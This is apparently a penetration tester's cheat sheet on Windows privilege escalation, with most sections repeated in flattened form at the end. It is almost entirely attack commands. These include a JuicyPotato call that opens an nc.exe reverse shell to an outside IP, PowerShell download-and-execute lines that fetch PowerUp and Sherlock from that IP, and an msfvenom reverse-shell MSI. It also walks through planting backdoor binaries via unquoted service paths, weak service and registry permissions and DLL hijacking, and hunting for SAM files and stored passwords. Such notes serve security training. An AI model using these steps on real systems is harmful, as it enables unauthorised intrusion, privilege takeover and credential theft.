Windows Privilege Escalation

ck OS, Patch level, Basic

// Some codesysteminfo  
Systeminfo | findstr /B /C:"OS Name" /C:"System Type"  etc .. 
## Updates
wmic qfe get Caption,Description,HotFixID,InstalledOn
Wmic logicaldisk get caption,description 

##Applications
wmic product get name, version, vendor
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

##Services 
sc query state=all | findstr "SERVICE_NAME:"
wmic service get name,displayname,pathname,startmode 
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}


## Volume
mountvol

## Drivers - in powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

whoami  
echo %USERNAME%  

whoami /priv
whoami /groups 
whoami /all
# If user has SeImpersonate privs 
# \\192.168.119.155\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c  \\192.168.119.155\test\nc.exe -e cmd.exe 192.168.119.155 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} 

net user  
net localgroup  
net user /domain  
net group /domain  
net group /domain <Group Name>

Firewall / AV / Defender

netsh firewall show state  
netsh firewall show config  
Sc query windefend
Netsh advfirewall firewall dump, netsh firewall show state

Network

ipconfig /all  
route print  
arp -A

Checklist automated tools

Run winpeas 
Run PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.155/PowerUp.ps1');Invoke-AllChecks"

Run Sherlock.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.155/Sherlock.ps1');Find-AllVulns"

accesschk.exe /accepteula -wvu
Folder Perms 
\\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Authenticated Users" C:\
\\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\
File Perms 
\\192.168.119.155\test\accesschk.exe /accepteula -uwqs  "Authenticated Users" C:\*.*
\\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\*.*

Run JAWS

# Executables  
WinPEAS.exe /.bat * 
Seatbelt.exe 
Watson.exe * 
Sharpup.exe 
windows-privesc-check2.exe --dump -G

#Powershell 
Sherlock.ps1 * 
PowerUp.ps1 * 
jaws-enumps1 * 


#Other 
Windows-exploit-suggester.py *
Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github 

MSF exploit suggester *
In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernel

Scheduled Tasks

schtasks /query /fo LIST /v  # Copy to schtasks.txt on local and run 
-> cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM  

dir %SystemRoot%\Tasks  

e.g. c:\windows\tasks\  
e.g. c:\windows\system32\tasks\  

# If we have write permissions on the  scheduleded taks binary / binary dir 
accesschk.exe -dqv "E:\GrabLogs"
copy evil-tftp.exe E:\GrabLogs\tftp.exe

Startups and autoruns

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Check access on the files and dir using accesschk , if writebale , we can write malicuis binary 
accesschk64.exe /accepteula -wvu "C:\Program Files\Autorun Program"

Service Permissions

Check if service config can be modified

accesschk.exe /accepteula  
accesschk.exe -uwcqv "Authenticated Users" * /accepteula  
accesschk.exe -ucqv \<Service Name>  

sc qc \<Service Name>  #  Get service details

Check service with weak file permission

wmic.exe  
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"  

sc.exe  
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt  

FOR /F %i in (Servicenames.txt) DO echo %i  

type Servicenames.txt  
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt  

FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

Unquoted Service Path

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  

sc query  
sc qc service name

AlwaysInstallElevated << IF 64 bits use: %SystemRoot%\Sysnative\reg.exe

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\

Check for AlwaysInstallElevated = 1 , if yes create a msfvenom msi payload 
msfvenom -p windows/shell_reverse_tcp lhost= lport= -f msi -o setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi

Pasword in files

Can we find any SAM files?

%SYSTEMROOT%\repair\SAM  
%SYSTEMROOT%\System32\config\RegBack\SAM  
%SYSTEMROOT%\System32\config\SAM  
%SYSTEMROOT%\repair\system  
%SYSTEMROOT%\System32\config\SYSTEM  
%SYSTEMROOT%\System32\config\RegBack\system  

findstr /si password *.txt  
findstr /si password *.xml  
findstr /si password *.ini  
Findstr /si password *.config 
findstr /si pass/pwd *.ini  

dir /s *pass* == *cred* == *vnc* == *.config*  

in all files  
findstr /spin "password" *.*  
findstr /spin "password" *.*

Registry

### VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"  
reg query "HKCU\Software\TightVNC\Server"  

### Windows autologin  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  

### SNMP Paramters  
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"  

### Putty  
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"  

### Search for password in registry  
reg query HKLM /f password /t REG_SZ /s  
reg query HKCU /f password /t REG_SZ /s

Unquoted Service Path Exploitation


## Case 1, SeShutdownPrivilege is listed when checked whoami /priv # doesn't matter even if it shows Disabled

# Search for services that auto start:
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
# Search for non-standard services
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows"
# Potential unquoted service output example
Heisenburg Service   heisenburgsvc     "C:\Program Files\Heisenburg\The One Who\knocks.exe"        auto

# next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub directory
icacls "C:\\"                         # or: .\accesschk.exe /accepteula -uwdq C:\
icacls "C:\Program Files"             # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files"
icacls "C:\Program Files\Heisenburg"  # or  .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg"

# Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg":
#                  BUILTIN\Users:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:
#  RW BUILTIN\Users

# Create reverse shell binary and copy it accordingly
copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" 

# now reboot to have the service auto start 
shutdown /r /t 0

## Case 2, SeShutdownPrivilege = Disabled, we have (service_stop,service_start) privilege on a service

# Search for services that has manual start mode and non-standard
wmic service get name,displayname,pathname,startmode | findstr /i "manual" | findstr /i /v "c:\windows"
# Potential unquoted service output example
Heisenburg Service   heisenburgsvc     "C:\Program Files\Heisenburg\The One Who\knocks.exe"        manual

# Check if we have service_stop, service_start privilege
.\accesschk.exe /accepteula -ucqv user heisenburgsvc

# next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub directory
icacls "C:\\"                         # or: .\accesschk.exe /accepteula -uwdq C:\
icacls "C:\Program Files"             # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files"
icacls "C:\Program Files\Heisenburg"  # or  .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg"

# Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg":
#                  BUILTIN\Users:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:
#  RW BUILTIN\Users



# Since there is spaces between "\The One Who\" on the path
# Windows will look for "\The.exe" first, then "\The One.exe", then "\The One Who.exe", and finally "\The One Who\knocks.exe"

# Create reverse shell binary and copy it accordingly

copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" 

# Start netcat listener to catch the reverse shell and start the service
net start heisenburgsvc # net stop heisenburgsvc first if the service is already running.

Weak Registry Permissions Exploitation

# Check permissions for an example service "upnphost"
Get-Acl HKLM:\System\CurrentControlSet\Services\upnphost | Format-List # PowerShell
# Example output, Check if NT AUTHORITY\INTERACTIVE has Full Control
# Access : Everyone Allow  ReadKey
#          NT AUTHORITY\INTERACTIVE Allow  FullControl
#          NT AUTHORITY\SYSTEM Allow  FullControl 
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\upnphost # same thing accesschk
# Example output for accesschk.exe:
#   RW NT AUTHORITY\INTERACTIVE
#         KEY_ALL_ACCESS

# Check if we have service_stop, service_start privilege
.\accesschk.exe /accepteula -ucqv user upnphost

# If both conditions are met we can start exploiting this now.

# list current values of the service
reg query HKLM\System\CurrentControlSet\Services\upnphost
# example output:
# HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\upnphost
#     DisplayName    REG_SZ    @%systemroot%\system32\upnphost.dll,-213
#     ErrorControl    REG_DWORD    0x1
#     ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\svchost.exe -k LocalServiceAndNoImpersonation
#     ...

# update ImagePath to point to our reverse shell payload
reg add HKLM\System\CurrentControlSet\Services\upnphost /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\backdoor.exe /f
# Start netcat listener to catch the reverse shell and start the service
net start "upnphost" # net stop "upnphost" first if the service is already running.

Weak Service Executable File Permissions Exploitation

# verifying we can overwrite and existing service binary file 
icacls "C:\Program Files\Heisenburg\knocks.exe"  # or .\accesschk.exe /accepteula -uvwq "C:\Program Files\Heisenburg\knocks.exe"

# Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg":
#                  Everyone:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:
#  RW BUILTIN\Users
#        FILE_ALL_ACCESS

# backup original executable
copy "C:\Program Files\Heisenburg\knocks.exe"  C:\Temp\

# Create reverse shell binary and overwrite the existing one
copy /Y C:\Temp\backdoor.exe "C:\Program Files\Heisenburg\knocks.exe" 
# Start netcat listener to catch the reverse shell and start the service
net start "heisenburgsvc" # net stop "heisenburgsvc" first if the service is already running.

DLL hijacking

You can see the DLL search order on 32-bit systems below:
1 - The directory from which the application loaded
2 - 32-bit System directory (C:\Windows\System32)
3 - 16-bit System directory (C:\Windows\System)
4 - Windows directory (C:\Windows)
5 - The current working directory (CWD)
6 - Directories in the PATH environment variable (system then user)
As a low privilege user we have little hope of putting a malicious DLL in 1-4, 5 is not a possibility in this case because we are talking about a Windows service but if we have write access to any of the directories in the Windows PATH we win.
echo %path%
# We can check our access permissions with accesschk or cacls
accesschk.exe -dqv "C:\Python27"
cacls "C:\Python27"
# Before we go over to action we need to check the status of the IKEEXT service. In this case we can see it is set to "AUTO_START" so it will launch on boot!
sc qc IKEEXT
copy evil.dll C:\Python27\wlbsctrl.dll
Restart

PreviousRecon NextActive Directory

Last updated 4 months ago

// Some codesysteminfo Systeminfo | findstr /B /C:"OS Name" /C:"System Type" etc .. ## Updates wmic qfe get Caption,Description,HotFixID,InstalledOn Wmic logicaldisk get caption,description ##Applications wmic product get name, version, vendor accesschk.exe -uws "Everyone" "C:\Program Files" Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} ##Services sc query state=all | findstr "SERVICE_NAME:" wmic service get name,displayname,pathname,startmode Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} ## Volume mountvol ## Drivers - in powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} whoami echo %USERNAME% whoami /priv whoami /groups whoami /all # If user has SeImpersonate privs # \\192.168.119.155\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.155\test\nc.exe -e cmd.exe 192.168.119.155 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} net user net localgroup net user /domain net group /domain net group /domain <Group Name>

Run winpeas Run PowerUp.ps1 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.155/PowerUp.ps1');Invoke-AllChecks" Run Sherlock.ps1 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.155/Sherlock.ps1');Find-AllVulns" accesschk.exe /accepteula -wvu Folder Perms \\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Authenticated Users" C:\ \\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\ File Perms \\192.168.119.155\test\accesschk.exe /accepteula -uwqs "Authenticated Users" C:\*.* \\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\*.* Run JAWS # Executables WinPEAS.exe /.bat * Seatbelt.exe Watson.exe * Sharpup.exe windows-privesc-check2.exe --dump -G #Powershell Sherlock.ps1 * PowerUp.ps1 * jaws-enumps1 * #Other Windows-exploit-suggester.py * Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github MSF exploit suggester * In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernel

schtasks /query /fo LIST /v # Copy to schtasks.txt on local and run -> cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM dir %SystemRoot%\Tasks e.g. c:\windows\tasks\ e.g. c:\windows\system32\tasks\ # If we have write permissions on the scheduleded taks binary / binary dir accesschk.exe -dqv "E:\GrabLogs" copy evil-tftp.exe E:\GrabLogs\tftp.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run wmic startup get caption,command reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" Check access on the files and dir using accesschk , if writebale , we can write malicuis binary accesschk64.exe /accepteula -wvu "C:\Program Files\Autorun Program"

wmic.exe for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" sc.exe sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\ Check for AlwaysInstallElevated = 1 , if yes create a msfvenom msi payload msfvenom -p windows/shell_reverse_tcp lhost= lport= -f msi -o setup.msi msiexec /quiet /qn /i C:\Temp\setup.msi

%SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Findstr /si password *.config findstr /si pass/pwd *.ini dir /s *pass* == *cred* == *vnc* == *.config* in all files findstr /spin "password" *.* findstr /spin "password" *.*

### VNC reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKCU\Software\TightVNC\Server" ### Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" ### SNMP Paramters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" ### Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" ### Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

## Case 1, SeShutdownPrivilege is listed when checked whoami /priv # doesn't matter even if it shows Disabled # Search for services that auto start: wmic service get name,displayname,pathname,startmode | findstr /i "auto" # Search for non-standard services wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows" # Potential unquoted service output example Heisenburg Service heisenburgsvc "C:\Program Files\Heisenburg\The One Who\knocks.exe" auto # next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub directory icacls "C:\\" # or: .\accesschk.exe /accepteula -uwdq C:\ icacls "C:\Program Files" # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files" icacls "C:\Program Files\Heisenburg" # or .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg" # Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg": # BUILTIN\Users:(F) # BUILTIN\Users:(I)(RX) # Example output for accesschk.exe: # RW BUILTIN\Users # Create reverse shell binary and copy it accordingly copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" # now reboot to have the service auto start shutdown /r /t 0 ## Case 2, SeShutdownPrivilege = Disabled, we have (service_stop,service_start) privilege on a service # Search for services that has manual start mode and non-standard wmic service get name,displayname,pathname,startmode | findstr /i "manual" | findstr /i /v "c:\windows" # Potential unquoted service output example Heisenburg Service heisenburgsvc "C:\Program Files\Heisenburg\The One Who\knocks.exe" manual # Check if we have service_stop, service_start privilege .\accesschk.exe /accepteula -ucqv user heisenburgsvc # next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub directory icacls "C:\\" # or: .\accesschk.exe /accepteula -uwdq C:\ icacls "C:\Program Files" # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files" icacls "C:\Program Files\Heisenburg" # or .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg" # Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg": # BUILTIN\Users:(F) # BUILTIN\Users:(I)(RX) # Example output for accesschk.exe: # RW BUILTIN\Users # Since there is spaces between "\The One Who\" on the path # Windows will look for "\The.exe" first, then "\The One.exe", then "\The One Who.exe", and finally "\The One Who\knocks.exe" # Create reverse shell binary and copy it accordingly copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" # Start netcat listener to catch the reverse shell and start the service net start heisenburgsvc # net stop heisenburgsvc first if the service is already running.

# Check permissions for an example service "upnphost" Get-Acl HKLM:\System\CurrentControlSet\Services\upnphost | Format-List # PowerShell # Example output, Check if NT AUTHORITY\INTERACTIVE has Full Control # Access : Everyone Allow ReadKey # NT AUTHORITY\INTERACTIVE Allow FullControl # NT AUTHORITY\SYSTEM Allow FullControl .\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\upnphost # same thing accesschk # Example output for accesschk.exe: # RW NT AUTHORITY\INTERACTIVE # KEY_ALL_ACCESS # Check if we have service_stop, service_start privilege .\accesschk.exe /accepteula -ucqv user upnphost # If both conditions are met we can start exploiting this now. # list current values of the service reg query HKLM\System\CurrentControlSet\Services\upnphost # example output: # HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\upnphost # DisplayName REG_SZ @%systemroot%\system32\upnphost.dll,-213 # ErrorControl REG_DWORD 0x1 # ImagePath REG_EXPAND_SZ %SystemRoot%\system32\svchost.exe -k LocalServiceAndNoImpersonation # ... # update ImagePath to point to our reverse shell payload reg add HKLM\System\CurrentControlSet\Services\upnphost /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\backdoor.exe /f # Start netcat listener to catch the reverse shell and start the service net start "upnphost" # net stop "upnphost" first if the service is already running.

# verifying we can overwrite and existing service binary file icacls "C:\Program Files\Heisenburg\knocks.exe" # or .\accesschk.exe /accepteula -uvwq "C:\Program Files\Heisenburg\knocks.exe" # Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg": # Everyone:(F) # BUILTIN\Users:(I)(RX) # Example output for accesschk.exe: # RW BUILTIN\Users # FILE_ALL_ACCESS # backup original executable copy "C:\Program Files\Heisenburg\knocks.exe" C:\Temp\ # Create reverse shell binary and overwrite the existing one copy /Y C:\Temp\backdoor.exe "C:\Program Files\Heisenburg\knocks.exe" # Start netcat listener to catch the reverse shell and start the service net start "heisenburgsvc" # net stop "heisenburgsvc" first if the service is already running.

You can see the DLL search order on 32-bit systems below: 1 - The directory from which the application loaded 2 - 32-bit System directory (C:\Windows\System32) 3 - 16-bit System directory (C:\Windows\System) 4 - Windows directory (C:\Windows) 5 - The current working directory (CWD) 6 - Directories in the PATH environment variable (system then user) As a low privilege user we have little hope of putting a malicious DLL in 1-4, 5 is not a possibility in this case because we are talking about a Windows service but if we have write access to any of the directories in the Windows PATH we win. echo %path% # We can check our access permissions with accesschk or cacls accesschk.exe -dqv "C:\Python27" cacls "C:\Python27" # Before we go over to action we need to check the status of the IKEEXT service. In this case we can see it is set to "AUTO_START" so it will launch on boot! sc qc IKEEXT copy evil.dll C:\Python27\wlbsctrl.dll Restart